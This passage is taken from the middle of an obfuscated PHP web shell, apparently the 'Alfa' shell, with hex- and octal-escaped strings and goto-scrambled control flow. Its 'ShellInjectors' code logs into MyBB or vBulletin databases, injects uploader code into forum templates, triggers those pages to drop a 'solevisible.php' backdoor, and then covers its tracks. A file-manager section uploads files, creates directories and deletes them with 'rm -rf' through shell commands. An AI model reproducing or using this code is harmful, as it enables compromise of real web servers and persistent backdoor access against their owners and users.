"\57\x73\157\154\145\166\x69\163\x69\x62\x6c\145\x2e\160\x68\160\47\x20\x74\141\162\x67\x65\x74\x3d\47\x5f\x62\x6c\141\x6e\153\x27\76" . $path . "\57\x73\157\154\145\x76\151\163\151\x62\154\145\56\160\x68\160\74\57\141\x3e\74\x2f\142\x3e\74\x2f\143\145\156\x74\145\162\76\74\x62\x72\76\74\x62\x72\76"; } } else { __alert("\x50\141\x74\150\x20\x69\163\40\156\x6f\164\x20\126\141\x6c\x69\x64\56\x2e\x2e"); } } } } if (isset($_POST["\x61\154\x66\x61\x32"]) && $_POST["\x61\x6c\x66\x61\x32"] == "\x6d\171\142\x62") { AlfaNum(1, 2, 3, 5); echo __pre() . "\74\x70\76\x3c\144\151\x76\40\x63\154\x61\x73\163\x3d\x27\x74\170\164\x66\157\x6e\x74\x5f\150\145\x61\144\x65\162\47\76\x7c\40\115\x79\x42\x42\x20\174\74\57\144\x69\166\76\x3c\x2f\x70\76\x3c\x63\145\x6e\x74\145\x72\76\x3c\x63\145\x6e\164\x65\162\x3e" . getConfigHtml("\155\x79\142\142") . "\74\146\x6f\162\x6d\40\x69\144\x3d\47\163\x65\x6e\144\141\152\x61\x78\47\x20\x6f\156\123\x75\x62\x6d\x69\x74\75\42\x67\50\x27\123\x68\145\x6c\x6c\x49\x6e\x6a\x65\143\x74\157\x72\x73\x27\54\x6e\165\x6c\x6c\54\156\165\154\x6c\x2c\x27\155\x79\142\x62\x27\54\156\165\x6c\x6c\54\164\x68\151\x73\x2e\x6d\x65\164\x68\157\144\56\x76\141\154\165\x65\x2c\x6e\165\x6c\x6c\54\164\x68\x69\163\x2e\x64\142\165\56\166\141\154\x75\x65\x2c\x74\x68\151\163\x2e\x64\x62\x6e\56\x76\141\x6c\x75\145\54\164\x68\151\163\56\144\x62\x70\56\x76\141\154\x75\145\x2c\164\x68\x69\163\56\144\x62\150\x2e\166\141\154\x75\x65\x2c\164\x68\x69\163\56\160\x72\x65\x66\x69\170\x2e\x76\141\x6c\165\145\51\73\40\162\x65\164\165\162\x6e\40\x66\141\154\163\x65\x3b\x22\40\155\x65\x74\x68\x6f\x64\x3d\120\x4f\123\x54\x3e\12"; $table = array("\x74\144\61" => array("\143\157\x6c\x6f\162" => "\x46\x46\x46\x46\x46\106", "\x74\144\x4e\x61\155\x65" => "\110\x6f\x73\x74\40\x3a\x20", "\x69\x6e\x70\165\164\x4e\x61\155\145" => "\144\142\x68", "\x69\144" => "\144\x62\x5f\x68\x6f\x73\x74", "\151\156\160\165\164\126\141\x6c\165\x65" => "\154\157\x63\x61\154\150\157\x73\164", "\151\x6e\x70\165\x74\123\151\x7a\145" => "\x35\60"), "\164\x64\62" => array("\x63\x6f\x6c\157\x72" => "\x46\x46\x46\106\x46\x46", "\164\144\116\141\155\x65" => "\104\x61\164\141\102\141\x73\145\x20\x4e\141\155\145\x20\72\40", "\151\x6e\160\x75\x74\x4e\141\155\145" => "\144\142\x6e", "\x69\144" => "\x64\x62\x5f\156\x61\155\x65", "\x69\156\x70\x75\x74\x56\141\x6c\165\145" => '', "\151\156\160\x75\x74\123\151\x7a\x65" => "\x35\60"), "\164\144\x33" => array("\143\157\154\157\x72" => "\x46\x46\106\106\x46\x46", "\164\144\116\x61\155\x65" => "\x55\x73\145\x72\x20\x4e\141\x6d\x65\x20\x3a\x20", "\x69\x6e\160\x75\x74\116\141\x6d\145" => "\x64\142\165", "\x69\x64" => "\144\142\x5f\165\x73\145\x72", "\151\x6e\x70\x75\164\126\141\x6c\165\145" => '', "\x69\156\160\165\x74\x53\x69\172\x65" => "\65\60"), "\x74\144\64" => array("\143\157\x6c\157\162" => "\x46\106\106\106\x46\106", "\164\144\x4e\x61\155\x65" => "\x50\x61\x73\163\167\157\162\x64\40\72\40", "\x69\156\x70\165\x74\x4e\x61\x6d\x65" => "\x64\142\x70", "\151\x64" => "\144\x62\x5f\x70\167", "\x69\x6e\x70\165\164\x56\x61\x6c\165\145" => '', "\x69\x6e\160\x75\x74\x53\x69\x7a\x65" => "\65\x30"), "\x74\x64\65" => array("\143\157\x6c\157\x72" => "\x46\106\x46\106\106\106", "\164\144\116\x61\155\145" => "\124\141\x62\154\x65\40\x50\162\145\146\151\170\40\x3a\x20", "\x69\x6e\160\x75\164\116\x61\x6d\145" => "\x70\162\x65\x66\x69\x78", "\151\x64" => "\144\142\137\x70\162\145\146\x69\170", "\151\x6e\160\x75\164\x56\x61\x6c\165\x65" => "\x6d\171\x62\142\x5f", "\151\156\160\x75\164\123\151\x7a\x65" => "\x35\x30")); create_table($table); echo $selector; echo "\x3c\160\76\74\151\x6e\x70\165\x74\x20\x74\x79\x70\x65\x3d\163\165\142\x6d\x69\x74\x20\x76\141\154\165\x65\75\47\40\47\x3e\74\x2f\x70\x3e\74\57\x66\x6f\162\x6d\x3e\74\x2f\143\145\156\x74\x65\162\x3e\x3c\x2f\143\x65\x6e\x74\x65\x72\x3e"; if (isset($_POST["\141\x6c\146\141\66"])) { $dbu = $_POST["\x61\154\x66\x61\x36"]; $dbn = $_POST["\x61\x6c\x66\x61\x37"]; $dbp = $_POST["\x61\x6c\x66\141\70"]; $dbh = $_POST["\x61\x6c\x66\x61\x39"]; $prefix = $_POST["\141\x6c\146\141\61\60"]; $method = $_POST["\141\154\x66\x61\x34"]; $shellCode = "\x7b\44\x7b" . ALFA_UPLOADER . "\175\x7d"; $newinshell = str_replace("\47", "\x5c\x27", $shellCode); if (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($newinshell)) { $conn = mysqli_connect($dbh, $dbu, $dbp, $dbn) or die(mysqli_error($conn)); $inject = "\x73\x65\x6c\x65\x63\164\x20\x74\x65\x6d\x70\x6c\141\164\x65\x20\x66\162\157\x6d\40{$prefix}\164\145\155\x70\154\141\x74\x65\x73\40\167\150\x65\162\x65\40\40\x74\x69\x74\x6c\145\x3d\x20\47\143\x61\x6c\145\x6e\144\x61\x72\x27"; $result = mysqli_query($conn, $inject) or die(mysqli_error($conn)); $GetTemp = mysqli_fetch_assoc($result); $saveDate = $GetTemp["\x74\145\155\x70\x6c\x61\164\145"]; $repsave = str_replace($shellCode, '', $saveDate); $repsave = str_replace("\x27", "\134\47", $repsave); $createShell = "\x75\160\x64\141\164\x65\x20{$prefix}\x74\145\x6d\160\x6c\141\164\x65\163\x20\x53\x45\124\40\x74\x65\155\160\154\x61\164\x65\75\40\47" . $newinshell . $repsave . "\47\x20\x77\x68\145\x72\x65\x20\164\x69\164\x6c\145\x20\75\x20\47\x63\x61\154\145\x6e\x64\x61\162\47"; $result2 = mysqli_query($conn, $createShell) or die(mysqli_error($conn)); $geturl = "\x73\x65\x6c\x65\x63\x74\40\x76\x61\x6c\x75\145\40\146\162\x6f\155\40{$prefix}\x73\145\164\x74\151\156\147\x73\40\x77\150\x65\162\145\x20\156\141\x6d\145\75\40\x27\142\x62\165\162\154\x27"; $findurl = mysqli_query($conn, $geturl) or die(mysqli_error($conn)); $rowb = mysqli_fetch_assoc($findurl); $furl = $rowb["\166\141\154\165\x65"]; $realurl = parse_url($furl, PHP_URL_HOST); $realpath = parse_url($furl, PHP_URL_PATH); $res = false; $AlfaCurl = new AlfaCURL(); if (extension_loaded("\x73\x6f\x63\x6b\145\x74\x73") && function_exists("\146\x73\x6f\143\x6b\x6f\160\145\x6e") && $method == "\141\165\x74\x6f") { if ($fsock = @fsockopen($realurl, 80, $errno, $errstr, 10)) { @fputs($fsock, "\x47\x45\x54\40{$realpath}\x2f\143\x61\154\x65\x6e\x64\x61\162\56\160\150\x70\40\x48\x54\x54\120\57\61\56\61\15\xa"); @fputs($fsock, "\110\117\x53\124\x3a\40{$realurl}\15\xa"); @fputs($fsock, "\103\157\156\x6e\145\143\x74\151\x6f\156\x3a\40\143\154\157\163\145\15\xa\xd\12"); $check = fgets($fsock); if (preg_match("\x2f\x32\x30\60\40\117\x4b\57\151", $check)) { $repairdbtemp = "\165\x70\x64\x61\164\x65\x20{$prefix}\164\145\x6d\160\x6c\141\x74\x65\x73\40\x53\x45\124\x20\x74\145\155\x70\154\141\164\x65\75\x20\x27{$repsave}\47\40\167\150\x65\x72\145\x20\164\x69\x74\154\145\40\x3d\40\47\143\x61\x6c\x65\156\144\141\x72\x27"; $clear = mysqli_query($conn, $repairdbtemp) or die(mysqli_error($conn)); $res = true; } @fclose($fsock); } } elseif (function_exists("\x63\x75\162\x6c\137\166\145\162\x73\151\157\156") && $method == "\141\x75\164\x6f") { $AlfaCurl->Send($realurl . $realpath . "\x2f\143\x61\154\x65\156\144\141\x72\56\x70\x68\160"); $res = true; } if ($res) { $ff = "\x68\164\x74\160\72\57\x2f" . $realurl . $realpath . "\57\163\157\154\x65\166\151\x73\x69\142\x6c\145\56\160\150\160"; output($ff); } else { $ff = "\x68\164\164\x70\x3a\x2f\57" . $realurl . $realpath . "\x2f\x63\x61\154\x65\x6e\144\141\x72\x2e\x70\x68\x70"; $fff = "\150\164\x74\160\72\x2f\x2f" . $realurl . $realpath . "\x2f\x73\157\154\x65\x76\x69\x73\x69\142\154\145\x2e\160\150\160"; echo "\74\x62\162\x3e\x3c\x70\x72\x65\x20\151\144\75\x27\x73\x74\162\117\165\164\160\x75\x74\x27\40\x73\164\x79\x6c\x65\75\47\x6d\141\162\147\151\x6e\55\164\x6f\x70\72\x35\160\x78\47\40\143\154\x61\x73\163\75\x27\x6d\154\61\47\76\74\x62\x72\76\74\143\x65\156\x74\145\x72\x3e\74\142\x3e\x3c\146\x6f\x6e\164\40\143\157\x6c\x6f\x72\75\47\43\106\x46\106\106\106\106\x27\x3e\120\x6c\x65\141\163\145\40\107\157\40\x54\157\40\124\141\162\x67\145\x74\40\x3d\x3e\x20\x3c\x2f\146\157\156\164\76\x3c\x61\x20\150\x72\x65\x66\75\47" . $ff . "\47\x20\x74\x61\162\x67\145\164\75\47\137\x62\154\x61\x6e\x6b\x27\x3e" . $ff . "\x3c\x2f\141\76\74\142\x72\57\76\74\x66\157\x6e\x74\x20\143\x6f\154\157\162\x3d\x27\x23\x46\106\x46\106\106\x46\x27\x3e\x41\x6e\x64\40\107\x6f\x20\124\157\40\75\x3e\x20\x3c\57\x66\157\x6e\164\x3e\x3c\x61\40\150\162\145\146\75\x27" . $fff . "\47\40\164\141\162\x67\x65\x74\x3d\47\x5f\x62\x6c\141\156\x6b\x27\x3e" . $fff . "\x3c\x2f\141\x3e\x3c\x2f\x62\x3e\74\57\143\145\156\x74\145\x72\76\74\142\x72\x3e\x3c\x62\162\76"; } } } } if (isset($_POST["\x61\x6c\x66\141\x33"]) && $_POST["\141\154\x66\x61\63"] == "\166\x62") { AlfaNum(1, 2, 7, 9, 10); echo __pre() . "\x3c\x70\76\x3c\x64\151\x76\x20\x63\154\x61\x73\x73\x3d\x22\x74\170\x74\146\157\x6e\164\137\150\145\141\x64\x65\162\42\x3e\174\40\x76\x62\x75\154\x6c\145\164\x69\x6e\x20\x7c\x3c\x2f\144\151\x76\76\74\x2f\x70\76\x3c\x70\76" . getConfigHtml("\166\142") . "\x3c\x2f\160\x3e\x3c\x66\157\162\x6d\x20\x6e\141\x6d\x65\75\42\146\162\155\x22\x20\155\x65\x74\x68\157\144\75\x22\120\117\123\124\x22\x20\x6f\156\163\x75\142\155\151\x74\75\x22\147\x28\47\x53\150\x65\x6c\x6c\x49\156\x6a\145\143\164\x6f\x72\x73\47\54\x6e\x75\154\x6c\x2c\156\165\154\154\54\x74\x68\x69\163\x2e\x6c\x6f\x2e\166\x61\154\x75\145\x2c\x27\x76\142\47\54\x74\x68\151\x73\56\x75\163\x65\x72\x2e\166\x61\154\165\x65\54\164\150\151\163\56\x70\141\163\x73\56\166\141\154\x75\x65\54\x74\x68\x69\163\56\x74\x61\142\56\166\141\154\165\145\x2c\x74\150\151\163\56\144\x62\56\166\141\x6c\x75\145\x2c\164\x68\151\x73\x2e\x6d\145\164\150\157\x64\x2e\166\x61\154\165\145\51\x3b\40\162\145\x74\165\x72\156\x20\x66\141\154\x73\145\73\42\76"; $table = array("\164\144\x31" => array("\x63\x6f\154\157\x72" => "\106\106\106\106\x46\106", "\x74\144\x4e\141\155\145" => "\x48\157\163\164\40\72\40", "\x69\x6e\x70\x75\x74\x4e\x61\x6d\x65" => "\x6c\x6f", "\151\x64" => "\144\x62\137\150\x6f\x73\164", "\x69\156\160\x75\164\126\x61\x6c\165\x65" => "\x6c\157\143\141\x6c\150\x6f\163\164", "\x69\x6e\x70\165\x74\123\x69\172\x65" => "\65\x30"), "\x74\x64\x32" => array("\143\157\154\x6f\x72" => "\106\x46\106\106\106\x46", "\164\144\x4e\141\x6d\x65" => "\104\141\164\141\x42\x61\163\145\x20\x4e\x61\x6d\145\x20\72\40", "\x69\156\160\x75\x74\x4e\141\x6d\x65" => "\x64\142", "\151\x64" => "\144\142\137\156\x61\155\145", "\x69\156\x70\165\164\126\x61\154\165\x65" => '', "\151\156\160\165\x74\x53\x69\x7a\145" => "\65\60"), "\x74\x64\63" => array("\x63\157\x6c\157\x72" => "\106\x46\x46\106\106\x46", "\164\x64\116\141\155\x65" => "\125\x73\x65\162\x20\x4e\x61\155\x65\40\x3a\x20", "\151\x6e\x70\165\164\x4e\x61\x6d\x65" => "\165\x73\145\162", "\151\x64" => "\x64\142\x5f\x75\163\145\x72", "\151\x6e\160\165\x74\x56\141\x6c\165\x65" => '', "\x69\x6e\x70\165\x74\123\151\x7a\x65" => "\x35\60"), "\x74\x64\64" => array("\143\x6f\x6c\x6f\x72" => "\x46\x46\106\x46\106\106", "\164\x64\x4e\x61\x6d\145" => "\x50\x61\163\163\167\157\162\144\x20\x3a\40", "\151\156\160\165\x74\116\x61\x6d\x65" => "\160\x61\x73\163", "\151\144" => "\x64\x62\x5f\160\x77", "\x69\156\160\165\x74\126\141\154\x75\145" => '', "\151\x6e\x70\165\x74\123\151\x7a\145" => "\65\60"), "\164\x64\x35" => array("\x63\x6f\154\x6f\162" => "\106\x46\106\x46\106\106", "\164\x64\x4e\x61\155\x65" => "\x54\x61\x62\154\145\x20\x50\162\x65\146\151\170\x20\x3a\x20", "\151\156\160\165\164\116\x61\x6d\x65" => "\x74\141\142", "\x69\x64" => "\144\x62\137\160\x72\145\x66\151\170", "\151\156\160\165\x74\x56\141\154\165\x65" => '', "\151\x6e\160\x75\x74\x53\151\172\x65" => "\x35\60")); create_table($table); echo $selector; echo "\x3c\x70\x3e\74\x69\x6e\160\x75\x74\40\164\x79\160\145\x3d\x22\163\165\142\155\x69\x74\42\x20\166\x61\x6c\x75\145\75\42\40\42\40\57\76\x3c\57\x70\76\74\x2f\x66\x6f\x72\155\76\x3c\x2f\x63\x65\156\164\x65\x72\76"; if (isset($_POST["\x61\154\x66\141\64"]) && !empty($_POST["\141\x6c\146\x61\64"])) { $method = $_POST["\x61\154\x66\141\x38"]; $faq_name = "\146\141\161"; $faq_file = "\57\146\141\x71\x2e\x70\x68\x70"; $code = "\173\x24\x7b" . ALFA_UPLOADER . "\x7d\175\173\44\x7b\x65\170\x69\164\x28\x29\175\175\46"; $conn = @mysqli_connect($_POST["\141\x6c\x66\141\62"], $_POST["\x61\154\146\141\64"], $_POST["\x61\154\146\141\65"], $_POST["\141\154\146\141\67"]) or die(@mysqli_connect_error()); $rec = "\x73\x65\x6c\x65\143\164\40\x60\x74\x65\x6d\x70\154\x61\164\x65\x60\x20\146\x72\x6f\155\40" . $_POST["\x61\x6c\146\141\66"] . "\x74\145\155\160\x6c\x61\164\145\40\x57\x48\x45\x52\105\x20\x74\x69\x74\154\145\x20\75\47" . $faq_name . "\47"; $recivedata = @mysqli_query($conn, $rec); $getd = @mysqli_fetch_assoc($recivedata); $savetoass = $getd["\164\145\155\160\154\x61\x74\x65"]; if (empty($savetoass)) { $faq_name = "\x68\x65\x61\x64\145\162"; $faq_file = "\x2f"; $rec = "\163\145\x6c\145\143\x74\x20\x60\x74\x65\x6d\160\x6c\x61\164\x65\140\x20\x66\162\x6f\x6d\x20" . $_POST["\141\154\x66\x61\66"] . "\x74\x65\155\x70\x6c\141\164\145\x20\127\110\105\122\105\x20\x74\151\x74\154\x65\40\75\x27" . $faq_name . "\47"; $recivedata = @mysqli_query($conn, $rec); $getd = @mysqli_fetch_assoc($recivedata); $savetoass = $getd["\164\145\x6d\160\x6c\x61\x74\x65"]; $code = ALFA_UPLOADER . "\73"; } $code = str_replace("\x27", "\x5c\x27", $code); $p = "\x55\x50\104\x41\124\x45\40" . $_POST["\x61\x6c\x66\x61\66"] . "\x74\145\155\x70\154\x61\164\x65\40\x53\105\124\x20\140\x74\x65\x6d\160\x6c\x61\164\x65\140\x3d\47" . $code . "\x27\40\127\x48\105\122\105\x20\140\x74\x69\164\154\x65\x60\x3d\x27" . $faq_name . "\47"; $ka = @mysqli_query($conn, $p) or die(mysqli_error($conn)); $geturl = @mysqli_query($conn, "\163\x65\154\x65\x63\x74\40\x60\x76\x61\x6c\165\x65\x60\x20\x66\162\157\155\x20" . $_POST["\x61\154\146\141\66"] . "\x73\x65\164\x74\151\156\x67\x20\x57\x48\105\x52\x45\40\x60\x76\x61\162\x6e\x61\155\x65\140\x3d\47\142\142\x75\x72\x6c\47"); $getval = @mysqli_fetch_assoc($geturl); $saveval = $getval["\x76\141\154\165\x65"]; if ($faq_name == "\x68\x65\141\x64\145\162") { if (substr($saveval, -5, 5) == "\x2f\x63\x6f\162\145") { $saveval = substr($saveval, 0, -5); } } $realurl = parse_url($saveval, PHP_URL_HOST); $realpath = parse_url($saveval, PHP_URL_PATH); $res = false; $AlfaCurl = new AlfaCURL(); if (extension_loaded("\x73\157\143\x6b\145\x74\163") && function_exists("\146\163\x6f\143\x6b\x6f\x70\x65\156") && $method == "\141\165\x74\157") { if ($fsock = @fsockopen($realurl, 80, $errno, $errstr, 10)) { @fputs($fsock, "\x47\x45\124\x20{$realpath}\x2e{$faq_file}\40\x48\124\x54\x50\x2f\x31\56\61\15\12"); @fputs($fsock, "\x48\117\x53\x54\x3a\x20{$realurl}\15\12"); @fputs($fsock, "\x43\x6f\x6e\x6e\x65\x63\x74\151\x6f\x6e\72\40\x63\154\157\x73\145\xd\12\15\xa"); $check = fgets($fsock); if (preg_match("\57\x32\60\x30\40\117\x4b\x2f\x69", $check)) { $p1 = "\x55\120\x44\101\124\105\x20" . $_POST["\x61\x6c\146\x61\66"] . "\164\145\x6d\160\154\141\x74\145\x20\x53\105\124\x20\164\145\155\x70\x6c\141\x74\x65\x20\x3d\x27" . mysqli_real_escape_string($conn, $savetoass) . "\x27\x20\127\x48\105\x52\105\40\x74\x69\164\154\x65\40\x3d\47" . $faq_name . "\x27"; $ka1 = @mysqli_query($conn, $p1) or die(mysqli_error($conn)); $res = true; } @fclose($fsock); } } elseif (function_exists("\x63\165\162\154\137\x76\x65\162\163\x69\157\x6e") && $method == "\x61\x75\x74\157") { $AlfaCurl->Send($realurl . $realpath . $faq_file); $p1 = "\125\120\x44\101\x54\x45\40" . $_POST["\x61\154\146\141\x36"] . "\x74\145\155\x70\x6c\x61\164\x65\40\123\x45\124\x20\164\145\155\160\154\141\164\x65\40\x3d\x27" . mysqli_real_escape_string($conn, $savetoass) . "\47\x20\x57\110\x45\122\105\x20\x74\151\x74\154\145\x20\x3d\47" . $faq_name . "\x27"; $ka1 = @mysqli_query($conn, $p1) or die(mysqli_error($conn)); $res = true; } if ($res) { $ff = "\x68\164\164\x70\72\x2f\57" . $realurl . $realpath . "\57\x73\157\154\x65\x76\x69\x73\x69\x62\154\145\56\x70\x68\160"; output($ff); } else { $ff = "\x68\164\x74\160\x3a\x2f\x2f" . $realurl . $realpath . $faq_file; $fff = "\150\x74\x74\160\72\57\57" . $realurl . $realpath . "\x2f\x73\157\x6c\145\x76\151\x73\x69\142\x6c\x65\56\x70\x68\x70"; echo "\74\143\145\x6e\x74\x65\162\76\74\160\76\x3c\x66\157\156\164\40\143\x6f\x6c\x6f\x72\x3d\x22\43\x46\106\x46\106\106\106\x22\x3e\x46\151\x72\163\164\40\117\160\145\156\x20\x54\150\x69\x73\40\x4c\151\156\153\40\75\x3e\x20\74\57\146\x6f\x6e\164\x3e\x3c\141\x20\150\162\x65\146\x3d\47" . $ff . "\47\40\x74\x61\162\147\145\164\x3d\x27\x5f\x62\x6c\x61\156\x6b\x27\x3e" . $ff . "\x3c\57\141\76\x3c\142\x72\x2f\x3e\x3c\146\x6f\x6e\x74\40\143\157\x6c\157\x72\x3d\x22\43\x46\x46\x46\106\106\106\x22\x3e\123\x65\143\157\156\x64\40\117\160\145\156\40\124\x68\151\163\40\114\151\156\153\x20\75\x3e\x20\74\57\146\x6f\x6e\164\x3e\74\141\x20\x68\162\x65\146\x3d\x27" . $fff . "\x27\x20\x74\x61\x72\x67\x65\164\75\47\137\x62\154\x61\x6e\x6b\x27\x3e" . $fff . "\74\x2f\141\76\74\x2f\x63\x65\156\164\145\x72\76\74\x2f\160\x3e"; } } } echo "\x3c\57\144\x69\x76\x3e"; alfafooter(); } goto CQ4Ti; KS5YC: if (!isset($GLOBALS["\104\x42\137\x4e\x41\115\105"]["\165\163\145\162"])) { die("\44\107\114\117\x42\x41\x4c\123\x5b\47\x44\102\x5f\x4e\101\x4d\x45\47\135\x5b\47\x75\163\145\162\47\135"); } goto wAV1i; e8nkk: $xd .= "\123\x65\162\166\x65\162\40\101\144\x6d\x69\x6e\40\x3a\x20" . $_SERVER["\123\105\122\126\x45\122\x5f\101\104\115\x49\x4e"] . "\xd\xa"; goto hho1B; tWrGE: function alfaFilesMan() { if (!empty($_COOKIE["\x61\154\x66\x61\137\x66"])) { $_COOKIE["\141\x6c\146\x61\137\x66"] = @unserialize($_COOKIE["\141\154\x66\x61\x5f\x66"]); } if (!empty($_POST["\x61\154\146\141\61"])) { switch ($_POST["\x61\x6c\x66\x61\61"]) { case "\x75\160\154\x6f\x61\x64\106\x69\x6c\145": $move_cmd_file = false; $alfa_canruncmd = false; if ($GLOBALS["\x67\154\x6f\142\x5f\143\x68\x64\151\162\137\x66\x61\x6c\x73\x65"]) { $alfa_canruncmd = _alfa_can_runCommand(true, true); $move_cmd_file = true; } if (_alfa_is_writable($GLOBALS["\x63\x77\x64"])) { $files = reArrayFiles($_FILES["\x66"]); $ret_files = array(); foreach ($files as $file) { if ($move_cmd_file && $alfa_canruncmd) { alfaEx("\x63\x61\x74\x20\47" . addslashes($file["\164\x6d\160\x5f\x6e\x61\x6d\145"]) . "\x27\x20\76\x20\47" . addslashes($_POST["\143"] . "\57" . $file["\x6e\x61\x6d\x65"]) . "\47"); } else { if (@move_uploaded_file($file["\164\155\160\x5f\x6e\x61\155\145"], $file["\x6e\141\x6d\x65"])) { $ow = function_exists("\x70\x6f\163\151\170\x5f\147\x65\164\160\x77\x75\151\x64") && function_exists("\146\151\x6c\145\x6f\x77\x6e\x65\x72") ? @posix_getpwuid(@fileowner($file["\x6e\x61\x6d\145"])) : array("\156\x61\x6d\145" => "\77\x3f\77\77"); $gr = function_exists("\160\157\x73\x69\x78\x5f\x67\145\x74\x67\162\x67\x69\x64") && function_exists("\146\151\154\x65\147\162\x6f\165\160") ? @posix_getgrgid(@filegroup($file["\156\141\155\145"])) : array("\x6e\141\155\x65" => "\77\77\77\x3f"); $file_owner = $ow["\x6e\x61\x6d\x65"] ? $ow["\x6e\x61\155\145"] : (function_exists("\x66\x69\154\x65\x6f\167\156\145\x72") ? @fileowner($file["\156\x61\x6d\145"]) : "\77\x3f\77\x3f"); $file_group = $gr["\x6e\141\155\145"] ? $gr["\x6e\141\x6d\145"] : (function_exists("\146\x69\x6c\x65\x67\162\157\165\x70") ? @filegroup($file["\x6e\x61\155\x65"]) : "\77\77\77\77"); $file_modify = @date("\x59\x2d\x6d\x2d\144\40\110\x3a\151\x3a\163", @filemtime($file["\x6e\141\x6d\x65"])); $file_perm = alfaPermsColor($file["\156\141\x6d\x65"]); $file_size = @filesize($file["\x6e\x61\x6d\145"]); $ret_files[] = array("\156\141\155\x65" => $file["\x6e\x61\x6d\145"], "\x73\x69\172\x65" => alfaSize($file_size), "\160\145\162\155" => $file_perm, "\x6d\x6f\x64\x69\146\171" => $file_modify, "\x6f\167\156\145\162" => $file_owner . "\57" . $file_group); } } } if (!$move_cmd_file) { echo json_encode($ret_files); } } else { echo "\x6e\x6f\x70\145\162\155"; return; } if (!$move_cmd_file) { return; } break; case "\x6d\153\x64\151\x72": $new_dir_cmd = false; if ($GLOBALS["\x67\x6c\x6f\x62\137\x63\x68\144\151\162\x5f\146\141\154\163\145"]) { if (_alfa_can_runCommand(true, true)) { if (_alfa_is_writable($GLOBALS["\x63\x77\x64"])) { if (!_alfa_is_dir(trim($_POST["\141\x6c\146\x61\62"]))) { alfaEx("\143\144\40\x27" . trim(addslashes($_POST["\143"])) . "\47\73\155\153\144\151\x72\40\47" . trim(addslashes($_POST["\141\154\146\141\x32"])) . "\x27"); echo "\x3c\x73\143\162\x69\160\x74\76\x61\x6c\146\x61\x53\x68\x6f\167\116\157\164\x69\146\151\143\141\164\x69\157\156\50\x27" . addslashes($_POST["\x61\x6c\146\141\x32"]) . "\x20\x63\162\145\141\164\x65\x64\x2e\x2e\x2e\x27\54\40\47\106\x69\154\x65\163\40\x6d\x61\x6e\141\147\145\x72\x27\51\x3b\x3c\57\x73\x63\162\x69\x70\x74\76"; } else { echo "\74\x73\x63\162\x69\160\164\x3e\x61\154\146\141\123\150\157\x77\116\x6f\164\151\x66\x69\143\x61\x74\x69\x6f\156\x28\47\x66\157\x6c\144\x65\162\x20\x61\154\162\145\141\x64\171\40\x65\x78\x69\x73\x74\x65\x64\47\54\x20\47\x46\x69\x6c\x65\163\x20\x6d\x61\156\141\147\145\x72\47\x2c\40\47\x65\162\162\x6f\162\x27\x29\73\x3c\57\163\x63\162\151\x70\164\x3e"; } } else { echo "\74\x73\x63\x72\x69\160\x74\76\x61\x6c\x66\x61\x53\150\x6f\167\x4e\x6f\164\x69\146\x69\x63\141\x74\x69\157\156\50\47\146\x6f\154\x64\x65\x72\40\151\x73\156\x74\x20\x77\x72\151\x74\x61\142\x6c\145\x20\x21\x27\54\40\47\x46\x69\x6c\x65\163\x20\155\141\156\x61\147\145\162\x27\x2c\40\x27\145\x72\162\157\x72\47\x29\73\x3c\57\x73\x63\x72\151\160\x74\76"; } } else { echo "\74\x73\143\162\x69\x70\x74\76\141\x6c\146\141\123\x68\157\x77\x4e\157\x74\151\x66\x69\143\x61\x74\151\x6f\x6e\x28\47\x43\x61\x6e\134\47\164\40\x63\x72\145\x61\164\145\40\x6e\145\x77\40\144\151\162\40\x21\x27\54\x20\47\106\x69\x6c\145\163\x20\155\x61\156\x61\147\x65\162\x27\x2c\x20\x27\x65\162\x72\x6f\x72\47\x29\x3b\74\57\x73\143\x72\151\160\x74\x3e"; } } else { if (_alfa_is_writable($GLOBALS["\x63\167\144"])) { if (!_alfa_is_dir(trim($_POST["\141\154\146\141\x32"]))) { if (!@mkdir(trim($_POST["\141\154\146\141\62"]))) { echo "\74\163\143\x72\151\160\164\76\141\x6c\146\141\123\150\x6f\167\x4e\157\x74\151\x66\151\x63\x61\164\x69\x6f\x6e\50\47\103\x61\156\x5c\47\164\x20\x63\162\145\141\x74\x65\x20\156\x65\167\40\144\151\162\40\x21\47\54\40\x27\x46\x69\x6c\x65\163\x20\x6d\x61\156\x61\x67\x65\162\47\x2c\x20\47\145\x72\x72\157\x72\47\x29\x3b\x3c\57\163\143\162\151\160\x74\76"; } else { echo "\74\163\x63\162\x69\x70\x74\76\x61\154\146\x61\x53\150\x6f\x77\116\x6f\164\x69\146\x69\x63\141\x74\x69\x6f\x6e\x28\x27" . addslashes($_POST["\141\x6c\x66\x61\x32"]) . "\x20\x63\x72\x65\141\164\145\x64\56\56\x2e\x27\x2c\40\47\x46\151\x6c\145\163\x20\x6d\141\156\x61\x67\145\162\x27\51\73\74\x2f\x73\x63\162\151\x70\164\x3e"; } } else { echo "\x3c\x73\x63\162\151\160\164\x3e\141\x6c\146\141\123\x68\x6f\167\x4e\x6f\164\x69\146\151\143\x61\164\151\157\x6e\50\x27\146\157\x6c\144\x65\162\x20\141\154\x72\145\141\x64\171\40\145\170\x69\163\x74\x65\x64\47\x2c\40\47\x46\x69\x6c\x65\x73\40\x6d\x61\156\141\147\145\x72\47\54\x20\47\145\x72\162\x6f\x72\47\51\73\x3c\57\163\x63\162\x69\x70\164\76"; } } else { echo "\74\x73\143\162\151\160\x74\x3e\x61\x6c\x66\141\123\x68\x6f\167\x4e\x6f\x74\151\146\x69\x63\141\x74\x69\x6f\156\x28\x27\146\157\154\x64\x65\162\40\x69\163\x6e\x74\x20\x77\162\151\164\141\x62\x6c\x65\40\x21\47\54\x20\x27\106\x69\154\145\163\x20\155\x61\x6e\x61\147\x65\162\x27\54\40\x27\x65\x72\x72\x6f\162\x27\51\x3b\x3c\x2f\x73\x63\162\x69\x70\164\76"; } } break; case "\x64\x65\154\x65\x74\145": function deleteDir($path) { $path = substr($path, -1) == "\57" ? $path : $path . "\x2f"; $dh = @opendir($path); while (($item = @readdir($dh)) !== false) { $item = $path . $item; if (basename($item) == "\56\56" || basename($item) == "\x2e") { continue; } $type = @filetype($item); if ($type == "\144\x69\x72") { deleteDir($item); } else { @unlink($item); } } @closedir($dh); @rmdir($path); } if (is_array(@$_POST["\x66"])) { foreach ($_POST["\146"] as $f) { if ($f == "\56\56") { continue; } $f = rawurldecode($f); if ($GLOBALS["\x67\154\157\142\137\x63\150\x64\x69\x72\137\x66\141\x6c\163\145"]) { if (_alfa_can_runCommand(true, true)) { alfaEx("\x72\x6d\x20\55\162\x66\40\47" . addslashes($_POST["\x63"] . "\57" . $f) . "\x27"); } } else { alfaEx("\x72\155\40\55\x72\x66\x20\47" . addslashes($f) . "\x27", false, false); if 